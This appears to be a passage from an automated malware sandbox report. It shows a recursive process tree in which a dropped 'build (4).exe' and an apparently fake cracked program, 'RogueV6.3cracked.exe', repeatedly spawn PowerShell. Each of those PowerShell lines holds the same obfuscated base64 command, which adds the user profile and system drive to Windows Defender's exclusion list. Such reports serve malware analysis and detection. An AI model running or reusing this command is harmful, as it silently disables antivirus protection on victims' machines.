        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAdAB4ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGYAZgB6ACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHEAdgBzACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGgAZgBtACMAPgA="
        35⤵
        Suspicious use of AdjustPrivilegeToken
        
        PID:6152
        
        C:\Users\Admin\AppData\Local\Temp\build (4).exe
        
        "C:\Users\Admin\AppData\Local\Temp\build (4).exe"
        35⤵
        Executes dropped EXE
        System Location Discovery: System Language Discovery
        
        PID:6156
        
        C:\Users\Admin\AppData\Local\Temp\RogueV6.3cracked.exe
        
        "C:\Users\Admin\AppData\Local\Temp\RogueV6.3cracked.exe"
        35⤵
        
        PID:420
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAdAB4ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGYAZgB6ACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHEAdgBzACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGgAZgBtACMAPgA="
        36⤵
        Suspicious use of AdjustPrivilegeToken
        
        PID:6620
        
        C:\Users\Admin\AppData\Local\Temp\build (4).exe
        
        "C:\Users\Admin\AppData\Local\Temp\build (4).exe"
        36⤵
        Executes dropped EXE
        
        PID:6624
        
        C:\Users\Admin\AppData\Local\Temp\RogueV6.3cracked.exe
        
        "C:\Users\Admin\AppData\Local\Temp\RogueV6.3cracked.exe"
        36⤵
        System Location Discovery: System Language Discovery
        
        PID:6792
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAdAB4ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGYAZgB6ACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHEAdgBzACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGgAZgBtACMAPgA="
        37⤵
        Suspicious use of AdjustPrivilegeToken
        
        PID:5892
        
        C:\Users\Admin\AppData\Local\Temp\build (4).exe
        
        "C:\Users\Admin\AppData\Local\Temp\build (4).exe"
        37⤵
        Executes dropped EXE
        
        PID:3684
        
        C:\Users\Admin\AppData\Local\Temp\RogueV6.3cracked.exe
        
        "C:\Users\Admin\AppData\Local\Temp\RogueV6.3cracked.exe"
        37⤵
        
        PID:2112
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAdAB4ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGYAZgB6ACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHEAdgBzACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGgAZgBtACMAPgA="
        38⤵
        System Location Discovery: System Language Discovery
        Suspicious use of AdjustPrivilegeToken
        
        PID:7096
        
        C:\Users\Admin\AppData\Local\Temp\build (4).exe
        
        "C:\Users\Admin\AppData\Local\Temp\build (4).exe"
        38⤵
        Executes dropped EXE
        
        PID:6668
        
        C:\Users\Admin\AppData\Local\Temp\RogueV6.3cracked.exe
        
        "C:\Users\Admin\AppData\Local\Temp\RogueV6.3cracked.exe"
        38⤵
        
        PID:6672
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAdAB4ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGYAZgB6ACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHEAdgBzACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGgAZgBtACMAPgA="
        39⤵
        Suspicious use of AdjustPrivilegeToken
        
        PID:7080
        
        C:\Users\Admin\AppData\Local\Temp\build (4).exe
        
        "C:\Users\Admin\AppData\Local\Temp\build (4).exe"
        39⤵
        Executes dropped EXE
        System Location Discovery: System Language Discovery
        
        PID:7000
        
        C:\Users\Admin\AppData\Local\Temp\RogueV6.3cracked.exe
        
        "C:\Users\Admin\AppData\Local\Temp\RogueV6.3cracked.exe"
        39⤵
        
        PID:6276
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAdAB4ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGYAZgB6ACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHEAdgBzACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGgAZgBtACMAPgA="
        40⤵
        Suspicious use of AdjustPrivilegeToken
        
        PID:5656
        
        C:\Users\Admin\AppData\Local\Temp\build (4).exe
        
        "C:\Users\Admin\AppData\Local\Temp\build (4).exe"
        40⤵
        Executes dropped EXE
        
        PID:6684
        
        C:\Users\Admin\AppData\Local\Temp\RogueV6.3cracked.exe
        
        "C:\Users\Admin\AppData\Local\Temp\RogueV6.3cracked.exe"
        40⤵
        
        PID:6560
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAdAB4ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGYAZgB6ACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHEAdgBzACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGgAZgBtACMAPgA="
        41⤵
        Suspicious use of AdjustPrivilegeToken
        
        PID:4284
        
        C:\Users\Admin\AppData\Local\Temp\build (4).exe
        
        "C:\Users\Admin\AppData\Local\Temp\build (4).exe"
        41⤵
        Executes dropped EXE
        
        PID:3852
        
        C:\Users\Admin\AppData\Local\Temp\RogueV6.3cracked.exe
        
        "C:\Users\Admin\AppData\Local\Temp\RogueV6.3cracked.exe"
        41⤵
        
        PID:2876
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAdAB4ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGYAZgB6ACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHEAdgBzACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGgAZgBtACMAPgA="
        42⤵
        Suspicious use of AdjustPrivilegeToken
        
        PID:1596
        
        C:\Users\Admin\AppData\Local\Temp\build (4).exe
        
        "C:\Users\Admin\AppData\Local\Temp\build (4).exe"
        42⤵
        Executes dropped EXE
        
        PID:1416
        
        C:\Users\Admin\AppData\Local\Temp\RogueV6.3cracked.exe
        
        "C:\Users\Admin\AppData\Local\Temp\RogueV6.3cracked.exe"
        42⤵
        
        PID:1664
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAdAB4ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGYAZgB6ACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHEAdgBzACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGgAZgBtACMAPgA="
        43⤵
        Suspicious use of AdjustPrivilegeToken
        
        PID:5568
        
        C:\Users\Admin\AppData\Local\Temp\build (4).exe
        
        "C:\Users\Admin\AppData\Local\Temp\build (4).exe"
        43⤵
        Executes dropped EXE
        
        PID:1600
        
        C:\Users\Admin\AppData\Local\Temp\RogueV6.3cracked.exe
        
        "C:\Users\Admin\AppData\Local\Temp\RogueV6.3cracked.exe"
        43⤵
        
        PID:3972
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAdAB4ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGYAZgB6ACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHEAdgBzACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGgAZgBtACMAPgA="
        44⤵
        Suspicious use of AdjustPrivilegeToken
        
        PID:4212
        
        C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        45⤵
        
        PID:6068
        
        C:\Users\Admin\AppData\Local\Temp\build (4).exe
        
        "C:\Users\Admin\AppData\Local\Temp\build (4).exe"
        44⤵
        Executes dropped EXE
        
        PID:7064
        
        C:\Users\Admin\AppData\Local\Temp\RogueV6.3cracked.exe
        
        "C:\Users\Admin\AppData\Local\Temp\RogueV6.3cracked.exe"
        44⤵
        
        PID:3260
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAdAB4ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGYAZgB6ACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHEAdgBzACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGgAZgBtACMAPgA="
        45⤵
        System Location Discovery: System Language Discovery
        Suspicious use of AdjustPrivilegeToken
        
        PID:956
        
        C:\Users\Admin\AppData\Local\Temp\build (4).exe
        
        "C:\Users\Admin\AppData\Local\Temp\build (4).exe"
        45⤵
        Executes dropped EXE
        
        PID:4380
        
        C:\Users\Admin\AppData\Local\Temp\RogueV6.3cracked.exe
        
        "C:\Users\Admin\AppData\Local\Temp\RogueV6.3cracked.exe"
        45⤵
        System Location Discovery: System Language Discovery
        
        PID:4508
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAdAB4ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGYAZgB6ACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHEAdgBzACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGgAZgBtACMAPgA="
        46⤵
        Suspicious use of AdjustPrivilegeToken
        
        PID:2812
        
        C:\Users\Admin\AppData\Local\Temp\build (4).exe
        
        "C:\Users\Admin\AppData\Local\Temp\build (4).exe"
        46⤵
        Executes dropped EXE
        System Location Discovery: System Language Discovery
        
        PID:6020
        
        C:\Users\Admin\AppData\Local\Temp\RogueV6.3cracked.exe
        
        "C:\Users\Admin\AppData\Local\Temp\RogueV6.3cracked.exe"
        46⤵
        
        PID:6480
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAdAB4ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGYAZgB6ACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHEAdgBzACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGgAZgBtACMAPgA="
        47⤵
        Suspicious use of AdjustPrivilegeToken
        
        PID:3636
        
        C:\Users\Admin\AppData\Local\Temp\build (4).exe
        
        "C:\Users\Admin\AppData\Local\Temp\build (4).exe"
        47⤵
        Executes dropped EXE
        
        PID:4720
        
        C:\Users\Admin\AppData\Local\Temp\RogueV6.3cracked.exe
        
        "C:\Users\Admin\AppData\Local\Temp\RogueV6.3cracked.exe"
        47⤵
        
        PID:5252
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAdAB4ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGYAZgB6ACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHEAdgBzACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGgAZgBtACMAPgA="
        48⤵
        Suspicious use of AdjustPrivilegeToken
        
        PID:5292
        
        C:\Users\Admin\AppData\Local\Temp\build (4).exe
        
        "C:\Users\Admin\AppData\Local\Temp\build (4).exe"
        48⤵
        Executes dropped EXE
        
        PID:5644
        
        C:\Users\Admin\AppData\Local\Temp\RogueV6.3cracked.exe
        
        "C:\Users\Admin\AppData\Local\Temp\RogueV6.3cracked.exe"
        48⤵
        
        PID:5548
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAdAB4ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGYAZgB6ACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHEAdgBzACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGgAZgBtACMAPgA="
        49⤵
        Suspicious use of AdjustPrivilegeToken
        
        PID:5752
        
        C:\Users\Admin\AppData\Local\Temp\build (4).exe
        
        "C:\Users\Admin\AppData\Local\Temp\build (4).exe"
        49⤵
        Executes dropped EXE
        
        PID:6032
        
        C:\Users\Admin\AppData\Local\Temp\RogueV6.3cracked.exe
        
        "C:\Users\Admin\AppData\Local\Temp\RogueV6.3cracked.exe"
        49⤵
        
        PID:6484
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAdAB4ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGYAZgB6ACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHEAdgBzACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGgAZgBtACMAPgA="
        50⤵
        Suspicious use of AdjustPrivilegeToken
        
        PID:1836
        
        C:\Users\Admin\AppData\Local\Temp\build (4).exe
        
        "C:\Users\Admin\AppData\Local\Temp\build (4).exe"
        50⤵
        Executes dropped EXE
        
        PID:4044
        
        C:\Users\Admin\AppData\Local\Temp\RogueV6.3cracked.exe
        
        "C:\Users\Admin\AppData\Local\Temp\RogueV6.3cracked.exe"
        50⤵
        
        PID:5424
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAdAB4ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGYAZgB6ACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHEAdgBzACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGgAZgBtACMAPgA="
        51⤵
        System Location Discovery: System Language Discovery
        Suspicious use of AdjustPrivilegeToken
        
        PID:2828
        
        C:\Users\Admin\AppData\Local\Temp\build (4).exe
        
        "C:\Users\Admin\AppData\Local\Temp\build (4).exe"
        51⤵
        Executes dropped EXE
        
        PID:2636
        
        C:\Users\Admin\AppData\Local\Temp\RogueV6.3cracked.exe
        
        "C:\Users\Admin\AppData\Local\Temp\RogueV6.3cracked.exe"
        51⤵
        
        PID:5336
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAdAB4ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGYAZgB6ACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHEAdgBzACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGgAZgBtACMAPgA="
        52⤵
        Suspicious use of AdjustPrivilegeToken
        
        PID:6080
        
        C:\Users\Admin\AppData\Local\Temp\build (4).exe
        
        "C:\Users\Admin\AppData\Local\Temp\build (4).exe"
        52⤵
        Executes dropped EXE
        
        PID:1868
        
        C:\Users\Admin\AppData\Local\Temp\RogueV6.3cracked.exe
        
        "C:\Users\Admin\AppData\Local\Temp\RogueV6.3cracked.exe"
        52⤵
        
        PID:5640
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAdAB4ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGYAZgB6ACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHEAdgBzACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGgAZgBtACMAPgA="
        53⤵
        Suspicious use of AdjustPrivilegeToken
        
        PID:6928
        
        C:\Users\Admin\AppData\Local\Temp\build (4).exe
        
        "C:\Users\Admin\AppData\Local\Temp\build (4).exe"
        53⤵
        Executes dropped EXE
        
        PID:5968
        
        C:\Users\Admin\AppData\Local\Temp\RogueV6.3cracked.exe
        
        "C:\Users\Admin\AppData\Local\Temp\RogueV6.3cracked.exe"
        53⤵
        
        PID:5516
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAdAB4ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGYAZgB6ACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHEAdgBzACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGgAZgBtACMAPgA="
        54⤵
        Suspicious use of AdjustPrivilegeToken
        
        PID:5132
        
        C:\Users\Admin\AppData\Local\Temp\build (4).exe
        
        "C:\Users\Admin\AppData\Local\Temp\build (4).exe"
        54⤵
        Executes dropped EXE
        System Location Discovery: System Language Discovery
        
        PID:1076
        
        C:\Users\Admin\AppData\Local\Temp\RogueV6.3cracked.exe
        
        "C:\Users\Admin\AppData\Local\Temp\RogueV6.3cracked.exe"
        54⤵
        System Location Discovery: System Language Discovery
        
        PID:4616
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAdAB4ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGYAZgB6ACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHEAdgBzACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGgAZgBtACMAPgA="
        55⤵
        Suspicious use of AdjustPrivilegeToken
        
        PID:2288
        
        C:\Users\Admin\AppData\Local\Temp\build (4).exe
        
        "C:\Users\Admin\AppData\Local\Temp\build (4).exe"
        55⤵
        Executes dropped EXE
        
        PID:1992
        
        C:\Users\Admin\AppData\Local\Temp\RogueV6.3cracked.exe
        
        "C:\Users\Admin\AppData\Local\Temp\RogueV6.3cracked.exe"
        55⤵
        
        PID:5460
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAdAB4ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGYAZgB6ACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHEAdgBzACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGgAZgBtACMAPgA="
        56⤵
        Suspicious use of AdjustPrivilegeToken
        
        PID:3368
        
        C:\Users\Admin\AppData\Local\Temp\build (4).exe
        
        "C:\Users\Admin\AppData\Local\Temp\build (4).exe"
        56⤵
        Executes dropped EXE
        
        PID:5064
        
        C:\Users\Admin\AppData\Local\Temp\RogueV6.3cracked.exe
        
        "C:\Users\Admin\AppData\Local\Temp\RogueV6.3cracked.exe"
        56⤵
        
        PID:6052
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAdAB4ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGYAZgB6ACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHEAdgBzACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGgAZgBtACMAPgA="
        57⤵
        Suspicious use of AdjustPrivilegeToken
        
        PID:1596
        
        C:\Users\Admin\AppData\Local\Temp\build (4).exe
        
        "C:\Users\Admin\AppData\Local\Temp\build (4).exe"
        57⤵
        Executes dropped EXE
        
        PID:6588
        
        C:\Users\Admin\AppData\Local\Temp\RogueV6.3cracked.exe
        
        "C:\Users\Admin\AppData\Local\Temp\RogueV6.3cracked.exe"
        57⤵
        
        PID:6064
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAdAB4ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGYAZgB6ACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHEAdgBzACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGgAZgBtACMAPgA="
        58⤵
        System Location Discovery: System Language Discovery
        Suspicious use of AdjustPrivilegeToken
        
        PID:6856
        
        C:\Users\Admin\AppData\Local\Temp\build (4).exe
        
        "C:\Users\Admin\AppData\Local\Temp\build (4).exe"
        58⤵
        Executes dropped EXE
        
        PID:5460
        
        C:\Users\Admin\AppData\Local\Temp\RogueV6.3cracked.exe
        
        "C:\Users\Admin\AppData\Local\Temp\RogueV6.3cracked.exe"
        58⤵
        
        PID:6548
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAdAB4ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGYAZgB6ACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHEAdgBzACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGgAZgBtACMAPgA="
        59⤵
        Suspicious use of AdjustPrivilegeToken
        
        PID:1512
        
        C:\Users\Admin\AppData\Local\Temp\build (4).exe
        
        "C:\Users\Admin\AppData\Local\Temp\build (4).exe"
        59⤵
        Executes dropped EXE
        
        PID:3656
        
        C:\Users\Admin\AppData\Local\Temp\RogueV6.3cracked.exe
        
        "C:\Users\Admin\AppData\Local\Temp\RogueV6.3cracked.exe"
        59⤵
        
        PID:6256
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAdAB4ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGYAZgB6ACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHEAdgBzACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGgAZgBtACMAPgA="
